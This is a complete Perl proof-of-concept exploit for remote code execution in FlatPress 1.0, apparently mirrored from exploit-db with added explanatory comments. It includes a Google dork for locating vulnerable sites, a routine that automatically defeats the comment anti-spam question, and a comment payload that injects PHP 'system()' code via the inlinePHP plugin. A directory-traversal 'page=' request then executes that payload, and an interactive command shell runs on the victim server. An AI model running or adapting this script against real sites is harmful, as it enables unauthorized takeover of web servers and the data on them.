Flatpress 1.0 – Remote Code Execution

  • 作者: Wireghoul
    日期: 2013-11-08
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/29515/
  • #!/usr/bin/perl
    # Exploit Title: Flatpress remote code execution PoC NULLday
    # Google Dork: This site is powered by FlatPress.
    # Date: 17/10/2013
    # Exploit Author: Wireghoul
    # Vendor Homepage: http://flatpress.org/home/
    # Software Link:
    http://downloads.sourceforge.net/project/flatpress/flatpress/FlatPress%201.0%20Solenne/flatpress-1.0-solenne.tar.bz2
    # Version: v1.0
    #
    # Blended threat, executes code injected into comment
    # by loading comment as a page through directory traversal
    # Requires the inlinePHP plugin to be enabled.
    # Written by @Wireghoul - justanotherhacker.com
    #
    # This is for my peeps and the freaks in the front row -- Hilltop Hoods:
    Nosebleed section
    
    use strict;
    use warnings;
    use LWP::UserAgent;
    
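    # Direct sub calls instead of the legacy &name; form (which silently passes
    # the caller's @_ through and bypasses any prototype).
    banner();
    usage() unless $ARGV[0];

    # Marker embedded in the comment author name so the injected comment can be
    # located again in the rendered comment list.
    my $injid = 'Spl0ited' . int(rand(9999));

    my $ua = LWP::UserAgent->new;
    $ua->timeout(10);
    # Honours HTTP_PROXY/HTTPS_PROXY, e.g. for routing through an intercepting proxy.
    $ua->env_proxy;
    # NOTE(review): the jar is created without autosave, so this relative path is
    # only read at start-up (if it exists) and never written back — cookies from
    # the run are not persisted. Presumably intentional for a one-shot PoC.
    $ua->cookie_jar({ file => "tmp/flatpress-rce.txt" });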
    
    sub banner {
        # Print the tool's identification line followed by the attribution rule.
        my @header = (
            "\nFlatpress remote code execution PoC by \@Wireghoul\n",
            "=======================[ justanotherhacker.com]==\n",
        );
        print @header;
    }
    
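    sub usage {
        # A missing target URL is an error: report it on STDERR and exit non-zero
        # so a wrapper script can tell it apart from a normal run.
        print STDERR "Usage: $0 <url>\n";
        exit 1;
    }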
    
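    # Percent-encode a string for use as a single query-string value: RFC 3986
    # unreserved characters pass through, everything else becomes %XX.
    sub _url_encode {
        my ($raw) = @_;
        $raw =~ s/([^A-Za-z0-9\-._~])/sprintf('%%%02X', ord $1)/ge;
        return $raw;
    }

    # Return the response body as a string, or '' when LWP could not decode one,
    # so the regex matches below never operate on undef.
    sub _body_of {
        my ($res) = @_;
        my $body = $res->decoded_content;
        return defined $body ? $body : '';
    }

    # Bound the anti-spam reload loop so a dead or unexpected target cannot keep
    # the script hammering it forever.
    my $max_attempts = 25;

    # Step 0: probe for the plugin file. This only proves the file exists on the
    # server; whether the plugin is *enabled* is only learned when the payload runs.
    my $plugin_url = "$ARGV[0]/fp-plugins/inlinephp/plugin.inlinephp.php";
    my $response   = $ua->get($plugin_url);
    if ($response->is_success) {
        print "[+] Inline PHP plugin found, hopefully it is enabled!\n";
    }
    else {
        print "[-] Inline PHP plugin not found at $plugin_url\n";
    }

    # Step 1: find an entry that exposes a comment form.
    $response = $ua->get($ARGV[0]);
    die $response->status_line unless $response->is_success;

    my ($cmntlink) = _body_of($response) =~ /(http.*?x=entry:entry.*?;comments:1#comments)/;
    if (!defined $cmntlink) {
        print "[-] Comment link not found\n";
        exit 1;
    }
    print "[+] Found comment link: $cmntlink\n";

    # Step 2: solve the arithmetic anti-spam question. Rather than parsing every
    # variant, reload until the form asks "N plus M", which we can answer.
    # $aaspam stays undef until solved so a legitimate "0 plus 0" is accepted.
    my $aaspam;
    my $attempts = 0;
    while (!defined $aaspam) {
        if (++$attempts > $max_attempts) {
            die "[-] Gave up on the anti-spam question after $max_attempts reloads\n";
        }
        $response = $ua->get($cmntlink);
        my $form = _body_of($response);
        if (my ($lhs, $rhs) = $form =~ /<strong>(\d+) plus (\d+) \? \(\*\)/) {
            $aaspam = $lhs + $rhs;
            print "[+] Defeated antispam $lhs + $rhs = $aaspam\n";
        }
        else {
            my ($question) = $form =~ m/<strong>(.*) \? \(\*\)/;
            $question = '(no question found)' unless defined $question;
            print "[*] Unknown antispam: $question ... retrying\n";
        }
    }

    # Step 3: post the comment carrying the payload. inlinePHP evaluates the
    # [exec]...[/exec] tag when the comment file is rendered as a page; the
    # SHELL/LLEHS markers delimit the command output for extraction later.
    $response = $ua->post(
        $cmntlink . "form",
        Content => {
            'name'    => $injid,
            'email'   => '',
            'url'     => '',
            'aaspam'  => $aaspam,
            'content' => "SHELL[exec]system(\$_GET['cmd']);[/exec]LLEHS",
            'submit'  => 'Add',
        }
    );
    # LWP does not follow redirects after a POST by default, so a 3xx here is
    # normal for an accepted submission; report the status and carry on.
    print "[*] Comment POST returned ", $response->status_line, "\n"
        unless $response->is_success;

    # Step 4: re-fetch the entry and locate our comment by the marker name.
    $response = $ua->get($cmntlink);
    my @cmnts    = split /<li id="comment/, _body_of($response);
    my @injected = grep { /\Q$injid\E/ } @cmnts;
    if (!@injected) {
        print '[-] Unable to identify the injection point';
        exit 1;
    }
    print "[+] Injection ($injid) successful\n";

    # Pull the date components and comment id out of the comment permalink; they
    # are needed to rebuild the on-disk path of the comment file.
    my ($base, $yy, $mm, $dd_ts, $cid) = $injected[0] =~
        m/(http.*?)x=entry:entry(\d\d)(\d\d)(\d\d-\d+);comments:1#comment(\d+-\d+)/
        or die "[-] Comment found but its permalink did not match the expected entry/comment format\n";

    # The page= parameter is the directory traversal: it walks out of the pages
    # directory into content/YY/MM/entryYYMMDD-.../comments/ so the comment file
    # is rendered as a page, which is where inlinePHP executes the [exec] tag.
    my $shell = "${base}page=../../content/$yy/$mm/entry$yy$mm$dd_ts/comments/comment$cid";

    # Step 5: pseudo-shell loop over the injected comment.
    print "[*] Dropping into shell, type exit to exit\n";
    $| = 1;    # flush the prompt before blocking on STDIN
    while (1) {
        print '$';
        my $line = <STDIN>;
        last unless defined $line;    # EOF (Ctrl-D) ends the session instead of spinning
        chomp $line;
        last if $line eq 'exit';
        next if $line eq '';

        # Encode the command: a raw '&', '#', '+' or space would otherwise be
        # parsed as query-string structure and truncate or mangle the command.
        my $output = $ua->get("$shell&cmd=" . _url_encode($line));
        my ($result) = _body_of($output) =~ /SHELL(.*)LLEHS/ms;
        if (defined $result) {
            $result =~ s{<br />}{}g;
            print "$result\n";
        }
        else {
            print "[-] No marked output in response (", $output->status_line,
                  "); the inlinePHP plugin may be disabled\n";
        }
    }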